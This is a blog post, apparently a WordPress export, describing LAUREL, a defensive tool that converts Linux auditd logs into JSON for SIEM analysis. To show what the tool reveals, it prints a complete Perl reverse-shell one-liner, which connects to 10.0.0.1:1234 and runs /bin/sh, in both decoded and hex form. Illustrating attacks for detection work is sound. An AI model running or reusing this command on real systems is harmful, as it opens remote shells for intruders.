{"id":26391,"date":"2022-08-12T12:56:57","date_gmt":"2022-08-12T12:56:57","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=26391"},"modified":"2022-08-12T12:57:00","modified_gmt":"2022-08-12T12:57:00","slug":"laurel","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/laurel\/","title":{"rendered":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage"},"content":{"rendered":"\n<p><strong>LAUREL<\/strong> is an event post-processing plugin for&nbsp;<em>auditd(8)<\/em>&nbsp;to improve its usability in modern security monitoring setups.<\/p>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#why\"><\/a>Why?<\/h2>\n\n\n\n<p>TLDR: Instead of audit events that look like this\u2026<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0=&#8221;perl&#8221; a1=&#8221;-e&#8221; a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742\u2026<\/strong><\/p>\n\n\n\n<p>\u2026turn them into JSON logs where the mess that your pen testers\/red teamers\/attackers are trying to make becomes apparent at first glance:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>{ \u2026 &#8220;EXECVE&#8221;:{ &#8220;argc&#8221;: 3,&#8221;ARGV&#8221;: [&#8220;perl&#8221;, &#8220;-e&#8221;, &#8220;use Socket;$i=\\&#8221;10.0.0.1\\&#8221;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\&#8221;tcp\\&#8221;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\&#8221;&gt;&amp;S\\&#8221;);open(STDOUT,\\&#8221;&gt;&amp;S\\&#8221;);open(STDERR,\\&#8221;&gt;&amp;S\\&#8221;);exec(\\&#8221;\/bin\/sh -i\\&#8221;);};&#8221;]}, \u2026}<\/strong><\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background 
wp-block-heading\">Description<\/h2>\n\n\n\n<p>Logs produced by the Linux Audit subsystem and&nbsp;<em>auditd(8)<\/em>&nbsp;contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via&nbsp;<code>PATH<\/code>&nbsp;and&nbsp;<code>EXECVE<\/code>&nbsp;elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see&nbsp;Practical&nbsp;<em>auditd(8)<\/em>&nbsp;problems.<\/p>\n\n\n\n<p><em>LAUREL<\/em>&nbsp;solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace&nbsp;<em>auditd(8)<\/em>&nbsp;as the consumer of audit messages from the kernel. Instead, it uses the&nbsp;<em>audisp<\/em>&nbsp;(&#8220;audit dispatch&#8221;) interface to receive messages via&nbsp;<em>auditd(8)<\/em>. Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).<\/p>\n\n\n\n<p>Refer to&nbsp;JSON-based log format&nbsp;for a description of the log format.<\/p>\n\n\n\n<p>We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. 
Please refer to&nbsp;Performance&nbsp;for details.<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#a-word-about-audit-rules\"><\/a>A word about audit rules<\/h2>\n\n\n\n<p>A good starting point for an audit ruleset is&nbsp;https:\/\/github.com\/Neo23x0\/auditd, but generally speaking, any ruleset will do.&nbsp;<em>LAUREL<\/em>&nbsp;will currently only work as designed if&nbsp;<em>End Of Event<\/em>&nbsp;records are not suppressed, so rules like<\/p>\n\n\n\n<p><code><strong>-a always,exclude -F msgtype=EOE<\/strong><\/code><\/p>\n\n\n\n<p>should be removed.<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/threathunters-io\/laurel#events-with-context\"><\/a>Events with context<\/h2>\n\n\n\n<p>Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available,&nbsp;<code>id<\/code>&nbsp;points to the message corresponding to the last&nbsp;<code>execve<\/code>&nbsp;syscall for this process:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>&#8220;PARENT_INFO&#8221;: {<br>&#8220;ID&#8221;: &#8220;1643635026.276:327308&#8221;,<br>&#8220;comm&#8221;: &#8220;sh&#8221;,<br>&#8220;exe&#8221;: &#8220;\/usr\/bin\/dash&#8221;,<br>&#8220;ppid&#8221;: 1532<br>}<\/strong><\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\">Adding more context: Keys and process labels<\/h2>\n\n\n\n<p>Audit events can contain a key, a short string that can be used to filter events.&nbsp;<em>LAUREL<\/em>&nbsp;can be configured to recognize such keys and attach them as labels to the process that caused the event. These labels can also be propagated to child processes. 
This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.<\/p>\n\n\n\n<p>Consider the following rule that sets a key for&nbsp;<em>apt<\/em>&nbsp;and&nbsp;<em>dpkg<\/em>&nbsp;invocations:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>-w \/usr\/bin\/apt-get -p x -k software_mgmt<\/strong><\/p>\n\n\n\n<p>Together with a ruleset that logs&nbsp;<em>execve(2)<\/em>&nbsp;and variants, this will cause every event directly caused by&nbsp;<code><strong>apt-get<\/strong><\/code>&nbsp;and its subprocesses to be labelled&nbsp;<code><strong>software_mgmt<\/strong><\/code>.<\/p>\n\n\n\n<p>For example, running&nbsp;<code><strong>sudo apt-get update<\/strong><\/code>&nbsp;on a Debian\/bullseye system with a few sources configured, the following subprocesses labelled&nbsp;<code><strong>software_mgmt<\/strong><\/code>&nbsp;can be observed in&nbsp;<em>LAUREL&#8217;s<\/em>&nbsp;audit log:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong><code>apt-get update<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/http<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/https<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/https<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/http<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/gpgv<\/code><\/strong><\/li><li><strong><code>\/usr\/lib\/apt\/methods\/gpgv<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><li><strong><code>\/usr\/bin\/dpkg --print-foreign-architectures<\/code><\/strong><\/li><\/ul>\n\n\n\n<p>This sort of tracking also works for package installation or removal. 
If some package&#8217;s post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/threathunters-io\/laurel\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>LAUREL is an event post-processing plugin for&nbsp;auditd(8)&nbsp;to improve its usability in modern security monitoring setups. Why? TLDR: Instead of audit events that look like this\u2026 type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0=&#8221;perl&#8221; a1=&#8221;-e&#8221; a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742\u2026 \u2026turn them into JSON logs where the mess that your pen testers\/red teamers\/attackers are trying to make becomes apparent at first glance: { \u2026 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":26400,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[5516,5517,3103],"class_list":["post-26391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-laurel","tag-linux-audit-logs","tag-siem"],"yoast_head":"<!-- 
This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage<\/title>\n<meta name=\"description\" content=\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/laurel\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\" \/>\n<meta property=\"og:description\" content=\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/laurel\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-12T12:56:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-08-12T12:57:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" 
content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\",\"datePublished\":\"2022-08-12T12:56:57+00:00\",\"dateModified\":\"2022-08-12T12:57:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\"},\"wordCount\":656,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"keywords\":[\"Laurel\",\"Linux Audit Logs\",\"siem\"],\"articleSection\":[\"Kali 
Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/laurel\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/laurel\/\",\"name\":\"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"datePublished\":\"2022-08-12T12:56:57+00:00\",\"dateModified\":\"2022-08-12T12:57:00+00:00\",\"description\":\"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring 
setups.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/laurel\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux 
Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/laurel\/","og_locale":"en_US","og_type":"article","og_title":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","og_description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","og_url":"https:\/\/kalilinuxtutorials.com\/laurel\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-08-12T12:56:57+00:00","article_modified_time":"2022-08-12T12:57:00+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. 
reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Laurel\u00a0: Transform Linux Audit Logs For SIEM Usage","datePublished":"2022-08-12T12:56:57+00:00","dateModified":"2022-08-12T12:57:00+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/"},"wordCount":656,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","keywords":["Laurel","Linux Audit Logs","siem"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/laurel\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/","url":"https:\/\/kalilinuxtutorials.com\/laurel\/","name":"Laurel\u00a0: Transform Linux Audit Logs For SIEM 
Usage","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","datePublished":"2022-08-12T12:56:57+00:00","dateModified":"2022-08-12T12:57:00+00:00","description":"LAUREL is an event post-processing plugin for\u00a0auditd(8)\u00a0to improve its usability in modern security monitoring setups.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/laurel\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/laurel\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux 
Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R 
K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2C0O4esSB3KC6FinXy-4ykql59KsBnWsuQqNfJnR8vrR9mODxXvaD3L8fz2g5hnRvYv_08viO2R-_0UX0HNiZdr0eBXKPj22prE8SB-PQlbKzxIhCenT4xKFiXjQNqz_ma9CluBgo6_uDyXrje2FIbLXdx8JxSc7JQk52X-ZeWZPcvtVs8gi3MsRp\/s728\/laurel-svg%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":29237,"url":"https:\/\/kalilinuxtutorials.com\/auditpolcis\/","url_meta":{"origin":26391,"position":0},"title":"auditpolCIS : CIS Benchmark Testing Of Windows SIEM Configuration","author":"R K","date":"July 18, 2023","format":false,"excerpt":"auditpolCIS is a CIS Benchmark testing of Windows SIEM configuration. This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points: The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019. The script\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=350%2C200&ssl=1 1x, 
